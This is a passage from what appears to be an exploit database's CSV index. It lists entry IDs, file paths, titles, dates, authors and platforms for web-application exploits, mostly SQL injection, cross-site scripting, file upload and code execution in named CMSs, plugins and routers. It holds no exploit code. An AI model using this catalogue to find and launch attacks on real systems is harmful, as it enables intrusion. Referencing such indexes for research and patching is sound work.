Open Redirection",2013-06-04,"Manuel García Cárdenas",webapps,php, +38547,exploits/php/webapps/38547.txt,"CMS Gratis Indonesia - 'config.php' PHP Code Injection",2013-06-04,"CWH Underground",webapps,php, +38548,exploits/php/webapps/38548.txt,"Telaen - Information Disclosure",2013-06-03,"Manuel García Cárdenas",webapps,php, +38550,exploits/cgi/webapps/38550.txt,"QNAP VioStor NVR / QNAP NAS - Remote Code Execution",2013-06-05,"Tim Herres",webapps,cgi, +38551,exploits/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",webapps,java, +38553,exploits/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass (2)",2015-10-28,"Soufiane Alami Hassani",webapps,hardware, +38560,exploits/php/webapps/38560.txt,"Caucho Resin - '/resin-admin/' URI Cross-Site Scripting",2013-06-07,"Gjoko Krstic",webapps,php, +38561,exploits/php/webapps/38561.txt,"Caucho Resin - 'index.php?logout' Cross-Site Scripting",2013-06-07,"Gjoko Krstic",webapps,php, +38562,exploits/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",webapps,php, +38563,exploits/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",webapps,php, +38565,exploits/php/webapps/38565.txt,"Joomla! Component com_jnews 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",webapps,php,80 +38567,exploits/php/webapps/38567.txt,"Max Forum - Multiple Vulnerabilities",2013-06-09,"CWH Underground",webapps,php, +38568,exploits/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Cross-Site Scripting",2013-06-09,Darksnipper,webapps,php, +38569,exploits/php/webapps/38569.txt,"Lokboard - 'index_4.php' PHP Code Injection",2013-06-10,"CWH Underground",webapps,php, +38570,exploits/php/webapps/38570.txt,"ScriptCase - 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",webapps,php, +38571,exploits/php/webapps/38571.txt,"mkCMS - 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",webapps,php, +38573,exploits/php/webapps/38573.txt,"eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",webapps,php, +38574,exploits/php/webapps/38574.html,"PHP Server Monitor 3.1.1 - Cross-Site Request Forgery / Privilege Escalation",2015-10-30,hyp3rlinx,webapps,php, +38575,exploits/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",webapps,hardware, +38577,exploits/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injections",2015-10-30,"Curesec Research Team",webapps,php, +38578,exploits/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",webapps,php, +38579,exploits/php/webapps/38579.txt,"Pligg CMS 2.0.2 - Cross-Site Request Forgery / Code Execution",2015-10-30,"Curesec Research Team",webapps,php, +38581,exploits/php/webapps/38581.txt,"Oxwall 1.7.4 - Cross-Site Request Forgery",2015-10-30,"High-Tech Bridge SA",webapps,php, +38585,exploits/php/webapps/38585.pl,"WordPress Plugin NextGEN Gallery - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",webapps,php, +38588,exploits/php/webapps/38588.php,"BloofoxCMS - 'index.php' Arbitrary File Upload",2013-06-17,"CWH Underground",webapps,php, +38590,exploits/php/webapps/38590.txt,"et-chat - Privilege Escalation / Arbitrary File Upload",2013-06-18,MR.XpR,webapps,php, +38592,exploits/php/webapps/38592.php,"Joomla! Component com_rokdownloads - Arbitrary File Upload",2013-06-19,Am!r,webapps,php, +38593,exploits/cgi/webapps/38593.txt,"FtpLocate - HTML Injection",2013-06-24,Chako,webapps,cgi, +38594,exploits/php/webapps/38594.txt,"Barnraiser Prairie - 'get_file.php' Directory Traversal",2013-06-25,prairie,webapps,php, +38596,exploits/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",webapps,php, +38598,exploits/php/webapps/38598.txt,"ZamFoo - 'date' Remote Command Injection",2013-06-15,localhost.re,webapps,php, +38602,exploits/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,webapps,windows, +38604,exploits/hardware/webapps/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",webapps,hardware, +38605,exploits/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",webapps,php, +38606,exploits/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' SQL Injection",2013-06-29,"IeDb ir",webapps,php, +38607,exploits/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,webapps,php, +38608,exploits/php/webapps/38608.txt,"WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Cross-Site Scripting",2013-06-30,"Prakhar Prasad",webapps,php, +38630,exploits/php/webapps/38630.html,"phpVibe 3.1 - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,webapps,php, +38621,exploits/php/webapps/38621.txt,"WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Cross-Site Scripting",2013-06-30,"Prakhar Prasad",webapps,php, +38624,exploits/php/webapps/38624.txt,"WordPress Plugin WP Feed - 'nid' SQL Injection",2013-07-02,"Iranian Exploit DataBase",webapps,php, +38625,exploits/php/webapps/38625.txt,"WordPress Plugin Category Grid View Gallery - 'ID' Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",webapps,php, +38628,exploits/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,webapps,php, +38629,exploits/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,webapps,php, +38642,exploits/php/webapps/38642.txt,"S9Y Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",webapps,php, +38635,exploits/php/webapps/38635.txt,"iVote - 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",webapps,php, +38638,exploits/php/webapps/38638.txt,"Mintboard - Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",webapps,php, +38639,exploits/php/webapps/38639.txt,"WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,webapps,php, +38640,exploits/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",webapps,multiple, +38641,exploits/multiple/webapps/38641.rb,"JSSE - SKIP-TLS",2015-11-05,"Ramon de C Valle",webapps,multiple, +38643,exploits/php/webapps/38643.txt,"WordPress Plugin Pie Register - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,webapps,php, +38646,exploits/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2015-11-06,hyp3rlinx,webapps,jsp, +38648,exploits/php/webapps/38648.txt,"WordPress Plugin My Calendar 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,webapps,php, +38649,exploits/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",webapps,php, +38651,exploits/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",webapps,php, +38652,exploits/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection",2015-11-07,"Dawid Golunski",webapps,php, +38653,exploits/asp/webapps/38653.txt,"Corda Highwire - 'Highwire.ashx' Full Path Disclosure",2013-07-12,"Adam Willard",webapps,asp, +38654,exploits/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' HTML Injection",2013-07-12,"Nate Drier",webapps,php, +38655,exploits/asp/webapps/38655.txt,"Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",webapps,asp, +38656,exploits/php/webapps/38656.html,"PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",webapps,php, +38657,exploits/hardware/webapps/38657.html,"Arris TG1682G Modem - Persistent Cross-Site Scripting",2015-11-09,Nu11By73,webapps,hardware, +38661,exploits/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan_ Balagopal N",webapps,php, +38664,exploits/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",webapps,java, +38665,exploits/php/webapps/38665.txt,"YesWiki 0.2 - 'template' Directory Traversal",2015-11-10,HaHwul,webapps,php, +38684,exploits/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,webapps,php, +38673,exploits/php/webapps/38673.txt,"Collabtive - Multiple Vulnerabilities",2013-07-22,"Enrico Cinquini",webapps,php, +38674,exploits/php/webapps/38674.txt,"WordPress Plugin FlagEm - 'cID' Cross-Site Scripting",2013-07-22,"IeDb ir",webapps,php, +38675,exploits/php/webapps/38675.html,"Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",webapps,php, +38676,exploits/php/webapps/38676.txt,"WordPress Plugin Duplicator - Cross-Site Scripting",2013-07-24,"High-Tech Bridge",webapps,php, +38677,exploits/php/webapps/38677.txt,"vBulletin 4.0.2 - 'update_order' SQL Injection",2013-07-24,n3tw0rk,webapps,php, +38678,exploits/php/webapps/38678.txt,"WordPress Plugin WP Fastest Cache 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",webapps,php, +38679,exploits/php/webapps/38679.txt,"Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,webapps,php, +38682,exploits/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting",2013-07-31,"High-Tech Bridge",webapps,php, +38683,exploits/php/webapps/38683.txt,"Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities",2013-07-31,"High-Tech Bridge",webapps,php, +38688,exploits/php/webapps/38688.txt,"b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,webapps,php, +38689,exploits/php/webapps/38689.txt,"Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",webapps,php, +38691,exploits/cgi/webapps/38691.txt,"Kwok Information Server - Multiple SQL Injections",2013-08-07,"Yogesh Phadtare",webapps,cgi, +38693,exploits/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",webapps,php, +38695,exploits/php/webapps/38695.txt,"CakePHP 2.2.8/2.3.7 - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",webapps,php, +38696,exploits/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",webapps,asp, +38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php, +38698,exploits/php/webapps/38698.html,"CF Image Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,webapps,php, +38699,exploits/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,webapps,php, +38706,exploits/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",webapps,multiple, +38707,exploits/hardware/webapps/38707.txt,"D-Link DIR-816L Wireless Router - Cross-Site Request Forgery",2015-11-16,"Bhadresh Patel",webapps,hardware, +38709,exploits/php/webapps/38709.txt,"MCImageManager - Multiple Vulnerabilities",2013-07-16,MustLive,webapps,php, +38712,exploits/php/webapps/38712.txt,"Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection",2013-08-20,"Ashiyane Digital Security Team",webapps,php, +38727,exploits/php/webapps/38727.txt,"AlegroCart 1.2.8 - Multiple SQL Injections",2015-11-16,"Curesec Research Team",webapps,php,80 +38728,exploits/php/webapps/38728.txt,"AlegroCart 1.2.8 - Local/Remote File Inclusion",2015-11-16,"Curesec Research Team",webapps,php,80 +38729,exploits/php/webapps/38729.txt,"ClipperCMS 1.3.0 - Multiple SQL Injections",2015-11-16,"Curesec Research Team",webapps,php,80 +38737,exploits/php/webapps/38737.txt,"Twilight CMS - DeWeS Web Server Directory Traversal",2013-08-21,"High-Tech Bridge",webapps,php, +38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python, +38739,exploits/java/webapps/38739.txt,"SearchBlox - Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",webapps,java, +38740,exploits/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",webapps,php, +38744,exploits/php/webapps/38744.txt,"appRain CMF - Multiple Cross-Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",webapps,php, +38745,exploits/php/webapps/38745.txt,"Xibo - 'layout' HTML Injection",2013-08-21,"Jacob Holcomb",webapps,php, +38746,exploits/php/webapps/38746.html,"Xibo - Cross-Site Request Forgery",2013-08-21,"Jacob Holcomb",webapps,php, +38748,exploits/php/webapps/38748.txt,"dBlog CMS - 'm' SQL Injection",2013-09-03,ACC3SS,webapps,php, +38749,exploits/asp/webapps/38749.txt,"Flo CMS - 'archivem' SQL Injection",2013-09-03,ACC3SS,webapps,asp, +38750,exploits/php/webapps/38750.txt,"WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload",2015-11-18,"Panagiotis Vagenas",webapps,php, +38753,exploits/php/webapps/38753.html,"WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,webapps,php, +38754,exploits/php/webapps/38754.txt,"eTransfer Lite - 'file name' HTML Injection",2013-09-10,"Benjamin Kunz Mejri",webapps,php, +38755,exploits/php/webapps/38755.txt,"WordPress Plugin mukioplayer4wp - 'cid' SQL Injection",2013-09-13,"Ashiyane Digital Security Team",webapps,php, +38756,exploits/php/webapps/38756.txt,"WordPress Plugin RokNewsPager - 'thumb.php' Multiple Vulnerabilities",2013-09-18,MustLive,webapps,php, +38757,exploits/php/webapps/38757.txt,"WordPress Plugin RokStories - 'thumb.php' Multiple Vulnerabilities",2013-09-17,MustLive,webapps,php, +38762,exploits/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Persistent Cross-Site Scripting",2015-11-19,Un_N0n,webapps,windows, +38765,exploits/php/webapps/38765.txt,"Horde Groupware 5.2.10 - Cross-Site Request Forgery",2015-11-19,"High-Tech Bridge SA",webapps,php,80 +38767,exploits/php/webapps/38767.txt,"WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,webapps,php, +38768,exploits/php/webapps/38768.txt,"WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,webapps,php, +38769,exploits/php/webapps/38769.txt,"Monstra CMS - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php, +38770,exploits/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",webapps,php, +38773,exploits/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",webapps,hardware, +38781,exploits/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Multiple SQL Injections",2013-10-02,"Yu-Chi Ding",webapps,php, +38803,exploits/php/webapps/38803.txt,"WordPress Plugin WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",webapps,php,80 +38782,exploits/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,webapps,php, +38776,exploits/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",webapps,cgi, +38777,exploits/php/webapps/38777.txt,"Joomla! Component JVideoClip 1.5.1 - 'uid' SQL Injection",2013-09-21,SixP4ck3r,webapps,php, +38780,exploits/php/webapps/38780.txt,"Silverstripe CMS - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",webapps,php, +38783,exploits/php/webapps/38783.php,"WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,webapps,php, +38784,exploits/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Directory Traversal",2013-10-08,"Ding Yu-Chi",webapps,php, +38785,exploits/php/webapps/38785.pl,"vBulletin 4.1.x - '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",webapps,php, +38786,exploits/php/webapps/38786.txt,"Ziteman CMS - Login Page SQL Injection",2013-10-10,"Ashiyane Digital Security Team",webapps,php, +38790,exploits/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution",2015-11-23,"Mohammad Reza Espargham",webapps,php,80 +38799,exploits/php/webapps/38799.txt,"Bilboplanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",webapps,php, +38800,exploits/php/webapps/38800.txt,"FreeSMS - '/pages/crc_handler.php?scheduleid' SQL Injection",2013-09-27,"Sarahma Security",webapps,php, +38801,exploits/php/webapps/38801.txt,"FreeSMS - '/pages/crc_handler.php' Multiple Cross-Site Scripting Vulnerabilities",2013-09-27,"Sarahma Security",webapps,php, +38806,exploits/cgi/webapps/38806.txt,"Bugzilla - 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",webapps,cgi, +38807,exploits/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Cross-Site Scripting",2013-10-09,"Mateusz Goik",webapps,cgi, +38808,exploits/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' SQL Injection",2013-10-08,Napsterakos,webapps,php, +38811,exploits/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,webapps,php, +38814,exploits/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Arbitrary File Upload",2013-10-20,SultanHaikal,webapps,php, +38816,exploits/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",webapps,jsp, +38819,exploits/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",webapps,php, +38820,exploits/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,webapps,php, +38822,exploits/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,webapps,windows,8080 +38831,exploits/php/webapps/38831.txt,"HumHub 0.11.2/0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",webapps,php,80 +38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php, +38830,exploits/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",webapps,php,80 +38833,exploits/linux/webapps/38833.txt,"Kodi 15 - Web Interface Arbitrary File Access (",2015-12-01,"Machiel Pronk",webapps,linux, +38840,exploits/hardware/webapps/38840.txt,"Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",webapps,hardware,80 +38841,exploits/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,webapps,php,80 +38842,exploits/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",webapps,php, +38843,exploits/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Local File Inclusion",2013-11-18,Esac,webapps,php, +38836,exploits/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",webapps,multiple, +38837,exploits/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",webapps,php, +38844,exploits/php/webapps/38844.html,"WordPress Plugin Blue Wrench Video Widget - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",webapps,php, +38848,exploits/php/webapps/38848.php,"WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,webapps,php, +38852,exploits/php/webapps/38852.pl,"PHPThumb - 'PHPThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,webapps,php, +38853,exploits/hardware/webapps/38853.sh,"D-Link DIR-Series Routers - '/model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,webapps,hardware, +38855,exploits/php/webapps/38855.txt,"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",webapps,php, +38856,exploits/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",webapps,php, +38861,exploits/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",webapps,php, +38862,exploits/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' SQL Injection",2013-12-06,xin.wang,webapps,php, +38863,exploits/php/webapps/38863.php,"NeoBill - '/modules/nullregistrar/PHPwhois/example.php?query' Remote Code Execution",2013-12-06,KedAns-Dz,webapps,php, +38864,exploits/php/webapps/38864.php,"NeoBill - '/install/include/solidstate.php' Multiple SQL Injections",2013-12-06,KedAns-Dz,webapps,php, +38865,exploits/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Local File Inclusion",2013-12-06,KedAns-Dz,webapps,php, +39563,exploits/php/webapps/39563.txt,"Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,webapps,php,80 +38867,exploits/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,webapps,php, +38868,exploits/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,webapps,php, +38869,exploits/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,webapps,php, +38870,exploits/php/webapps/38870.txt,"WordPress Plugin Easy Career Openings - 'jobid' SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,webapps,php, +38872,exploits/php/webapps/38872.php,"WordPress Plugin PhotoSmash Galleries - 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",webapps,php, +38873,exploits/php/webapps/38873.txt,"eduTrac - 'showmask' Directory Traversal",2013-12-11,"High-Tech Bridge",webapps,php, +38874,exploits/php/webapps/38874.txt,"BoastMachine - 'blog' SQL Injection",2013-12-13,"Omar Kurt",webapps,php, +38875,exploits/php/webapps/38875.php,"osCMax - Arbitrary File Upload / Full Path Information Disclosure",2013-12-09,KedAns-Dz,webapps,php, +38876,exploits/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp?pa' SQL Injection",2013-12-16,R3d-D3V!L,webapps,php, +38877,exploits/php/webapps/38877.txt,"C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass)",2013-12-16,R3d-D3V!L,webapps,php, +38879,exploits/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injections",2013-12-14,R3d-D3V!L,webapps,asp, +38880,exploits/php/webapps/38880.txt,"Veno File Manager - 'q' Arbitrary File Download",2013-12-11,"Daniel Godoy",webapps,php, +38881,exploits/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,webapps,php, +38882,exploits/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",webapps,cgi, +38883,exploits/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - '/apps/news-events/newdetail.asp?id' SQL Injection",2013-12-13,R3d-D3V!L,webapps,asp, +38884,exploits/asp/webapps/38884.txt,"Dynamic Biz Website Builder 'QuickWeb' 1.0 - '/login.asp' Multiple Field SQL Injections / Authentication Bypass",2013-12-13,R3d-D3V!L,webapps,asp, +38885,exploits/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,webapps,php, +38886,exploits/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,webapps,php, +38887,exploits/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,webapps,php, +38888,exploits/php/webapps/38888.txt,"iScripts AutoHoster - 'invno' SQL Injection",2013-12-15,i-Hmx,webapps,php, +38889,exploits/php/webapps/38889.txt,"iScripts AutoHoster - 'main_smtp.php' Traversal",2013-12-15,i-Hmx,webapps,php, +38890,exploits/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Local File Inclusion",2013-12-15,i-Hmx,webapps,php, +38891,exploits/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Local File Inclusion",2013-12-15,i-Hmx,webapps,php, +38892,exploits/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Local File Inclusion",2013-12-15,i-Hmx,webapps,php, +38895,exploits/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,webapps,php,80 +38896,exploits/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity Processing",2015-12-08,LiquidWorm,webapps,xml, +38897,exploits/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,webapps,xml, +38898,exploits/xml/webapps/38898.txt,"OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities",2015-12-08,LiquidWorm,webapps,xml, +38899,exploits/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,webapps,xml, +38901,exploits/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,webapps,php,80 +38902,exploits/php/webapps/38902.txt,"WordPress Plugin Polls Widget 1.0.7 - SQL Injection",2015-12-08,WICS,webapps,php,80 +38906,exploits/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,webapps,php,80 +38907,exploits/php/webapps/38907.txt,"Osclass - Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,webapps,php, +38908,exploits/php/webapps/38908.txt,"Leed - 'id' SQL Injection",2013-12-18,"Alexandre Herzog",webapps,php, +38913,exploits/hardware/webapps/38913.txt,"WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities",2015-12-09,alimp5,webapps,hardware, +38914,exploits/hardware/webapps/38914.txt,"WIMAX MT711x - Multiple Vulnerabilities",2015-12-09,alimp5,webapps,hardware, +38915,exploits/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,webapps,php,80 +38919,exploits/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,webapps,php, +40437,exploits/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,webapps,java, +38920,exploits/php/webapps/38920.txt,"AFCommerce - 'adblock.php' Remote File Inclusion",2013-12-25,NoGe,webapps,php, +38921,exploits/php/webapps/38921.txt,"AFCommerce - 'adminpassword.php' Remote File Inclusion",2013-12-25,NoGe,webapps,php, +38922,exploits/php/webapps/38922.txt,"AFCommerce - 'controlheader.php' Remote File Inclusion",2013-12-25,NoGe,webapps,php, +38924,exploits/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,webapps,php, +38927,exploits/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,webapps,php,80 +38928,exploits/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,webapps,php,80 +38929,exploits/hardware/webapps/38929.txt,"Skybox Platform < 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",webapps,hardware,8443 +38935,exploits/asp/webapps/38935.txt,"CMS Afroditi - 'id' SQL Injection",2013-12-30,"projectzero labs",webapps,asp, +38936,exploits/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 